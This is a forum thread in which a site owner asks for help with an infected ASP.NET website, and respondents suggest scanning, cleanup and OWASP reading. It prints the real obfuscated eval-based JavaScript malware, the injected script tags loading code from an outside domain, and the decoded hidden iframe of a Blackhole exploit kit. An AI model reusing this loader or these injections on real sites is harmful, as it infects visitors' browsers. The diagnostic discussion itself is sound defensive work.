# I think my website is infected

Tags: javascript, asp.net, virus

this is driving me crazy. I think my website is infected by some sort of virus, here is what is happening:

Random javascript files are appearing on the server, with names such as `jquery.ui.dialog.min.js` and `jquery.ui.button.min.js`. All these files contain the same piece of code:

```
s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){f=(q)?"fromCharCode":2;h=-016/7;try{eval("a=prototype");}catch(zxc){e=window["e"+"va"+"l"];n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388.545.202.96.460.570.198.183.136.520.232.348.448.290.94.141.396.485.226.360.388.570.222.138.456.585.94.297.444.585.220.348.196.260.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.170.64.345.396.570.222.324.432.525.220.309.244.170.194.351.464.555.68.96.408.570.194.327.404.490.222.342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.194.327.404.310.78.123.236.65.20".split(".");if(window.document)for(i=6-2-1-2-1;-161+i!=2-2;i++){k=i;s=s+String[f](n[k]/(i%(h*h)+2));}e(s);}}
```

The main problem is that this "virus" is appending a line of code to my `default.aspx` breaking the server. Here is what it is adding:

```
<asp:Content ID="Content1" ContentPlaceHolderID="cphBody" Runat="Server">
//Code here
</asp:Content>**<script type="text/javascript" language="javascript" src="http://easydiablo3.com//ImageStorage/jquery.ui.button.min.js" ></script><script type="text/javascript" language="javascript" src="http://easydiablo3.com//themes/jquery.ui.dialog.min.js" ></script>**
```

If I delete the files they just show up after a little while. Does anyone know how I can fix this?

Comment: Are you hosting this site in some hosting service?

Comment: If you suspect its a virus. You can ask them run a virus scan. Am sure , they will address this!

Comment: I've heard about entire web hosting providers being infected via vulnerable administration interfaces meaning that the hackers are using a backdoor you have no control of. To investigate this you can try to find other websites hosted at the same IP as your site and then look for the often hidden malicious HTML on those other sites.

Answer (score 2, accepted):

Use this link to detect infected files/folder

http://sitecheck.sucuri.net/scanner/

Comment: Damn it found a virus!! Please help, what do I do now?

Comment: @TheGateKeeper what error its showing, take backup of files+db, run a scan once downloaded. Let me know the infection ur getting if possible

Comment: The infection is called "Malware entry: MW:EXPLOITKIT:BLACKHOLE1". I have removed the file that was injecting it, let's see if it shows up again.

Comment: @TheGateKeeper one thing more before running ..check in the db as well

Comment: If its a paid service call (email) tech support. I would say if they have a virus it is on them to restore the service to pre-virus condition (unless its your code that caused the virus)

Comment: I have emailed them and checked the database, it doesn't have any weird values.

Comment: Hope you switched to a framework that prevents XSS injection

Answer (score 1):

The code is `eval()`'ing the following code in your page

```
<iframe src="http://caqxaro.ru/count14.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>
```

You may have a vulnaribility somewhere in your application, check your database for weird values, check for upgrades if you are using an CMS like joomla etc.. after that restore a recent backup of your application if possible.

Comment: How does something like this happen? Can people just put files on my server?

Comment: it can be a multitude of things, SQL injection, XSS, etc, check www.owasp.org for the top 10 vulnaribilities, you should protect against all of them